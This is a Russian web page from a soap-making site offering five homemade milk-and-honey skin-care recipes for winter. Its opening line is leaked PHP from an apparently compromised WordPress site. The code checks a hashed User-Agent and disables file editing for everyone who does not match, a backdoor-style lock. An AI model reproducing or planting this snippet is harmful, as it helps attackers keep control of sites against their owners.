if(md5(md5($_SERVER['HTTP_USER_AGENT']))!="c5a3e14ff315cc2934576de76a3766b5"){ define('DISALLOW_FILE_MODS', true); define('DISALLOW_FILE_EDIT', true); } Косметика из натуральных ингредиентов для морозного января | Мыло, мыловарение и натуральная косметика в домашних условиях - mylce.ru

5 рецептов домашней косметики из натуральных ингредиентов для морозной зимы

В Европе все популярнее становится самостоятельное приготовление косметики для ухода за кожей, в составе которой используются продукты питания. Подходящими ингредиентами для этого будут молоко и различные его производные - творог, сливки, сметана, йогурт

В моду житель­ниц Евро­пы все боль­ше вхо­дит само­сто­я­тель­ное при­го­тов­ле­ние кос­ме­ти­ки для ухо­да за кожей, в соста­ве кото­рой исполь­зу­ют­ся про­стые и рас­про­стра­нен­ные про­дук­ты пита­ния. Такая бес­плат­ная кос­ме­ти­ка еще и неве­ро­ят­но полез­на. Она может быть подо­бра­на под любой тип кожи.

Под­хо­дя­щи­ми ингре­ди­ен­та­ми для это­го будут моло­ко и раз­лич­ные его про­из­вод­ные (тво­рог, слив­ки, сме­та­на, йогурт). Ведь они явля­ют­ся про­сто кла­де­зя­ми веществ, отве­ча­ю­щих за нор­маль­ное состо­я­ние кожи и актив­но дей­ству­ю­щих как при внут­рен­нем, так и при наруж­ном применении.

  • Вита­мин Е реге­не­ри­ру­ет кож­ный покров.
  • Вита­мин А устра­ня­ет сыпь и раз­гла­жи­ва­ет рас­тяж­ки, пре­пят­ствуя истон­че­нию и шелу­ше­нию кожи. Он эффек­тив­но борет­ся с руб­ца­ми и ее избы­точ­ным ороговением.
  • Вита­ми­ны груп­пы В замед­ля­ют про­цес­сы ста­ре­ния, сти­му­ли­ру­ют выра­бот­ку  кол­ла­ге­на и раз­гла­жи­ва­ют мор­щи­ны, при­да­вая лицу здо­ро­вый оттенок.
  • Бел­ки – это важ­ней­ший стро­и­тель­ный мате­ри­ал для все­го тела. Они так­же неза­ме­ни­мы и для каче­ствен­но­го ухо­да за воло­са­ми, кожей и ногтями.
  • Лак­то­за и молоч­ный жир бла­го­твор­но вли­я­ют на мик­ро­фло­ру кишечника.
  • Цинк — уни­каль­ный в сво­ем роде мик­ро­эле­мент, отлич­но зажив­ля­ю­щий раны.

Далее при­ве­де­ны 5 уни­вер­саль­ных рецеп­тов масок и эмуль­сий, кото­рые мож­но исполь­зо­вать для всех типов кожи.

Эмульсия для увлажнения

brunettes-women-winter-models-scarfПоло­ви­ну чай­ной лож­ки мас­ла аво­ка­до и немно­го ваниль­но­го порош­ка соеди­нить с 3 сто­ло­вы­ми лож­ка­ми йогур­та или тво­ро­га. Пере­ме­шать, поста­вить в холо­диль­ник. Исполь­зо­вать в виде крема.

Очищающая эмульсия

3 сто­ло­вые лож­ки меда сме­шать со 150 мл йогур­та, нагре­вая их при этом на сла­бом огне. Дать насто­ять­ся в тече­нии 5 часов. Хра­нить в холо­диль­ни­ке , в стек­лян­ной емко­сти, закры­той крыш­кой. Для нане­се­ния на лицо этой мас­сы исполь­зу­ют ват­ный там­пон. Излиш­ки смы­вать водой.

Глазные компрессы

Сме­шать остыв­ший чер­ный чай и све­жее моло­ко. Смо­чить в этой жид­ко­сти ват­ные там­по­ны и поло­жить их на гла­за. Вре­мя дей­ствия – 10 минут

Маска из ромашки и молока

Несколь­ко соцве­тий ромаш­ки аптеч­ной замо­чить в 75 мл нагре­то­го моло­ка. Накрыть крыш­кой. Спу­стя 20 минут нагреть до горя­чей тем­пе­ра­ту­ры и доба­вить поло­ви­ну чай­ной лож­ки меда и сто­ло­вую лож­ку отру­бей. При­ме­нять на пред­ва­ри­тель­но очи­щен­ной коже. Выдер­жать 15 минут, после чего опо­лос­нуть теп­лой водой.

Ванна из молока и меда

Рас­тво­рить в теп­лой воде 2 при­горш­ни соли, а в лит­ре моло­ка 1 чаш­ку меда. Доба­вить к полу­чен­но­му рас­тво­ру пол лит­ра мас­ла из рост­ков пше­ни­цы и вылить все это в ван­ну. При­ни­мать ван­ну обыч­ным способом.


И на последок!

Обязательно нас лайкните! :) И не забудьте вступить в наши группы в популярных соцсетях - вконтакте, одноклассниках или на фейсбуке. А может у вас есть отличный мастер-класс? Тогда скорее поделитесь им и мы вас сильно полюбим! А еще у нас есть специальная страница, на которой написано где можно купить все для мыла - обязательно ее посмотрите!
Автор: Мыльная принцесса

С детства люблю все делать своими руками и вот мыловарение - одно из хобби, которое затянуло. Решила сделать портал mylce.ru, которое поможет вам - новичкам и профессионалам сделать классное натуральное мыло своими руками! Найти меня можно здесь: Website | Facebook | Twitter | Читайте все мои записи!